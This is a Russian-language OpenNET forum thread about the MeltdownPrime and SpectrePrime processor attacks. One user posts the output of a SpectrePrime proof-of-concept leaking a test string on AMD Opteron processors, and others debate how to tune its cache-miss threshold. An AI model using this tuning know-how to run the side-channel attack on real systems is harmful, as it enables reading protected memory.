The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Представлены новые виды атак MeltdownPrime и SpectrePrime, opennews (??), 17-Фев-18, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


129. "Представлены новые виды атак MeltdownPrime и SpectrePrime"  +5 +/
Сообщение от pavlinux (ok), 18-Фев-18, 15:36 
> Утверждается, что MeltdownPrime и SpectrePrime позволяют добиться большей точности воссоздания информации.
> Для демонстрации метода опубликован прототип эксплоита SpectrePrime, который при 100 тестовых запусках
> продемонстрировал точность работы 99.95%, в то время как точность классического эксплоита для уязвимости
>  Spectre составляет 97.9%.

Ну что, опеннетовские аналитики-скрипт-киддики, ниасилили? :)


pavel@amd64:/media/kernel/Exploits/Spectreprime-attack$ ./spectreprime
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdffa18... Unclear: 0x54=T score=’963’ (second best: 0x4C=T score=761)
Reading at malicious_x = 0xffffffffffdffa19... Unclear: 0x68=h score=’942’ (second best: 0xDC=h score=772)
Reading at malicious_x = 0xffffffffffdffa1a... Unclear: 0x65=e score=’948’ (second best: 0xA4=e score=717)
Reading at malicious_x = 0xffffffffffdffa1b... Unclear: 0x20=  score=’975’ (second best: 0xA4=  score=754)
Reading at malicious_x = 0xffffffffffdffa1c... Unclear: 0x4D=M score=’979’ (second best: 0xA4=M score=754)
Reading at malicious_x = 0xffffffffffdffa1d... Unclear: 0x61=a score=’918’ (second best: 0xA4=a score=779)
Reading at malicious_x = 0xffffffffffdffa1e... Unclear: 0x67=g score=’943’ (second best: 0xA4=g score=733)
Reading at malicious_x = 0xffffffffffdffa1f... Unclear: 0x69=i score=’983’ (second best: 0xDC=i score=765)
Reading at malicious_x = 0xffffffffffdffa20... Unclear: 0x63=c score=’975’ (second best: 0xDC=c score=767)
Reading at malicious_x = 0xffffffffffdffa21... Unclear: 0x20=  score=’929’ (second best: 0x14=  score=787)
Reading at malicious_x = 0xffffffffffdffa22... Unclear: 0x57=W score=’970’ (second best: 0xDC=W score=741)
Reading at malicious_x = 0xffffffffffdffa23... Unclear: 0x6F=o score=’980’ (second best: 0xDC=o score=746)
Reading at malicious_x = 0xffffffffffdffa24... Unclear: 0x72=r score=’978’ (second best: 0xDC=r score=775)
Reading at malicious_x = 0xffffffffffdffa25... Unclear: 0x64=d score=’956’ (second best: 0xDC=d score=731)
Reading at malicious_x = 0xffffffffffdffa26... Unclear: 0x73=s score=’962’ (second best: 0xA4=s score=732)
Reading at malicious_x = 0xffffffffffdffa27... Unclear: 0x20=  score=’981’ (second best: 0xDC=  score=733)
Reading at malicious_x = 0xffffffffffdffa28... Unclear: 0x61=a score=’975’ (second best: 0xDC=a score=734)
Reading at malicious_x = 0xffffffffffdffa29... Unclear: 0x72=r score=’959’ (second best: 0xA4=r score=751)
Reading at malicious_x = 0xffffffffffdffa2a... Unclear: 0x65=e score=’981’ (second best: 0xDC=e score=743)
Reading at malicious_x = 0xffffffffffdffa2b... Unclear: 0x20=  score=’969’ (second best: 0x14=  score=737)
Reading at malicious_x = 0xffffffffffdffa2c... Unclear: 0x53=S score=’975’ (second best: 0xDC=S score=761)
Reading at malicious_x = 0xffffffffffdffa2d... Unclear: 0x71=q score=’978’ (second best: 0xDC=q score=781)
Reading at malicious_x = 0xffffffffffdffa2e... Unclear: 0x75=u score=’976’ (second best: 0xDC=u score=800)
Reading at malicious_x = 0xffffffffffdffa2f... Unclear: 0x65=e score=’982’ (second best: 0x4C=e score=757)
Reading at malicious_x = 0xffffffffffdffa30... Unclear: 0x61=a score=’900’ (second best: 0xA4=a score=763)
Reading at malicious_x = 0xffffffffffdffa31... Unclear: 0x6D=m score=’964’ (second best: 0xA4=m score=736)
Reading at malicious_x = 0xffffffffffdffa32... Unclear: 0x69=i score=’961’ (second best: 0xDC=i score=754)
Reading at malicious_x = 0xffffffffffdffa33... Unclear: 0x73=s score=’979’ (second best: 0x14=s score=759)
Reading at malicious_x = 0xffffffffffdffa34... Unclear: 0x68=h score=’975’ (second best: 0xA4=h score=751)
Reading at malicious_x = 0xffffffffffdffa35... Unclear: 0x20=  score=’972’ (second best: 0xA4=  score=747)
Reading at malicious_x = 0xffffffffffdffa36... Unclear: 0x4F=O score=’913’ (second best: 0xA4=O score=764)
Reading at malicious_x = 0xffffffffffdffa37... Unclear: 0x73=s score=’866’ (second best: 0xA4=s score=747)
Reading at malicious_x = 0xffffffffffdffa38... Unclear: 0x73=s score=’967’ (second best: 0xA4=s score=748)
Reading at malicious_x = 0xffffffffffdffa39... Unclear: 0x69=i score=’969’ (second best: 0xA4=i score=785)
Reading at malicious_x = 0xffffffffffdffa3a... Unclear: 0x66=f score=’986’ (second best: 0xA4=f score=736)
Reading at malicious_x = 0xffffffffffdffa3b... Unclear: 0x72=r score=’922’ (second best: 0xA4=r score=729)
Reading at malicious_x = 0xffffffffffdffa3c... Unclear: 0x61=a score=’975’ (second best: 0xA4=a score=766)
Reading at malicious_x = 0xffffffffffdffa3d... Unclear: 0x67=g score=’885’ (second best: 0xA4=g score=806)
Reading at malicious_x = 0xffffffffffdffa3e... Unclear: 0x65=e score=’911’ (second best: 0xA4=e score=812)
Reading at malicious_x = 0xffffffffffdffa3f... Unclear: 0x2E=. score=’890’ (second best: 0xA4=. score=812)

Вероятность 93.3%

2 x AMD Opteron(tm) Processor 438

#define CACHE_MISS_THRESHOLD (200)

Ответить | Правка | Наверх | Cообщить модератору

138. "Представлены новые виды атак MeltdownPrime и SpectrePrime"  +1 +/
Сообщение от Anonim (??), 19-Фев-18, 00:40 
А теперь подробнее, пожалуйста, для тех, кто нифига не понял.
Ответить | Правка | Наверх | Cообщить модератору

176. "Представлены новые виды атак MeltdownPrime и SpectrePrime"  +3 +/
Сообщение от pavlinux (ok), 19-Фев-18, 20:06 
> А теперь подробнее, пожалуйста, для тех, кто нифига не понял.

Эксплойт работает, защита - нет. Intel/AMD - дырявые.  

Ответить | Правка | Наверх | Cообщить модератору

178. "Представлены новые виды атак MeltdownPrime и SpectrePrime"  +/
Сообщение от Anonymoustus (ok), 19-Фев-18, 20:16 
>> А теперь подробнее, пожалуйста, для тех, кто нифига не понял.
> Эксплойт работает, защита - нет. Intel/AMD - дырявые.

И что нам теперь делать?

Ответить | Правка | Наверх | Cообщить модератору

179. "Представлены новые виды атак MeltdownPrime и SpectrePrime"  +1 +/
Сообщение от pavlinux (ok), 19-Фев-18, 20:38 
>>> А теперь подробнее, пожалуйста, для тех, кто нифига не понял.
>> Эксплойт работает, защита - нет. Intel/AMD - дырявые.
> И что нам теперь делать?

Новый проц. покупать.

Ответить | Правка | Наверх | Cообщить модератору

182. "Представлены новые виды атак MeltdownPrime и SpectrePrime"  +/
Сообщение от Anonymoustus (ok), 19-Фев-18, 22:44 
>>>> А теперь подробнее, пожалуйста, для тех, кто нифига не понял.
>>> Эксплойт работает, защита - нет. Intel/AMD - дырявые.
>> И что нам теперь делать?
> Новый проц. покупать.

Все десять (сто, тысячу)?

Ответить | Правка | Наверх | Cообщить модератору

186. "Представлены новые виды атак MeltdownPrime и SpectrePrime"  +/
Сообщение от Аноним (-), 19-Фев-18, 22:57 
> Новый проц. покупать.

Захочешь - не купишь. Фикшеных процов в продаже еще просто нет. Более того - даже в разрабатываемых семействах всплыли дыры и теперь они там заново весь цикл перезапустят, начиная с написания кода, чтобы массово не релизнуть кривой кремний. А вы уж там извольте как-нибудь покурить бамбук годик-другой.

Ответить | Правка | К родителю #179 | Наверх | Cообщить модератору

193. "Представлены новые виды атак MeltdownPrime и SpectrePrime"  +1 +/
Сообщение от pavlinux (ok), 21-Фев-18, 04:33 
> покурить бамбук годик-другой.

Я так и написал :)

Ответить | Правка | Наверх | Cообщить модератору

139. "Представлены новые виды атак MeltdownPrime и SpectrePrime"  +1 +/
Сообщение от Ne01eX (ok), 19-Фев-18, 01:42 
>[оверквотинг удален]
> Вероятность 93.3%
> 2 x AMD Opteron(tm) Processor 438
> #define CACHE_MISS_THRESHOLD (200)

Ты будешь смеяться, но эту константу нужно подбирать для каждого процессора индивидуально. :-D :-D :-D На самом деле надо такты считать и уже от этого отталкиваться. То что ты смог подобрать/посчитать это значение для себя конечно похвально, но, есть мнение, что код перестанет работать если ты попытаешься, например, его оптимизировать с разными уровнями или наоборот, - добавить опцию -ggdb. В принципе, более стабильно работающего прототипа эксплоита можно было бы добиться, переписав код на асм, но от этого он не перестанет быть прототипом. :-)

Ответить | Правка | К родителю #129 | Наверх | Cообщить модератору

142. "Представлены новые виды атак MeltdownPrime и SpectrePrime"  +3 +/
Сообщение от pavlinux (ok), 19-Фев-18, 02:38 
>>[оверквотинг удален]
>> Вероятность 93.3%
>> 2 x AMD Opteron(tm) Processor 438
>> #define CACHE_MISS_THRESHOLD (200)
> Ты будешь смеяться, но эту константу нужно подбирать для каждого процессора индивидуально.

Cмишно. Именно это я и делал. :) На дефолтных ни первый ни этот эксплойт не срабатывал.
от 154 и выше, первые буковки начинают появляться после 120  


> На самом деле надо такты считать и уже от этого отталкиваться.

1. Такты ЦПУ тут ваще никаким боком не влияют. (точнее примерно так же как и
температура проца, версия компилятора)

2. Такты уже лет 20 никто не считает, так как мануалы с растактовками
команд после Pentium MMX никто не видел.


> То что ты смог подобрать/посчитать это значение для себя  

Йопт,  

for (unsigned long long CACHE_MISS_THRESHOLD = 0; i < INFINITY; i++)  
{
  ...
}


> если ты попытаешься, например, его оптимизировать с разными уровнями или наоборот, - добавить опцию -ggdb.

Клёва, прям 5 класс вспомнил.

Ответить | Правка | Наверх | Cообщить модератору

143. "Представлены новые виды атак MeltdownPrime и SpectrePrime"  +1 +/
Сообщение от Ne01eX (ok), 19-Фев-18, 05:20 
А разве нельзя просто всё высчитать относительно nop, которая гарантированно выполняется за 1 такт или, используя ту же mov регистр регистр, которая выполняется за два такта? Обязательно нужен готовый многотомный мануал с расписанными значениям? :-)
Ответить | Правка | Наверх | Cообщить модератору

164. "Представлены новые виды атак MeltdownPrime и SpectrePrime"  +2 +/
Сообщение от pavlinux (ok), 19-Фев-18, 16:59 
Шот тебя не в ту сторону понесло.
Даже не знаю, как будет быстрее, перебрать 1000*1000 вариантов или сначала
узнать CACHE_MISS c погрешностью хотя б 1-2%, чтоб с первого раза попасть.

Мну кажется, что методом научного тыка типа qsort оно быстрее получится.  

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру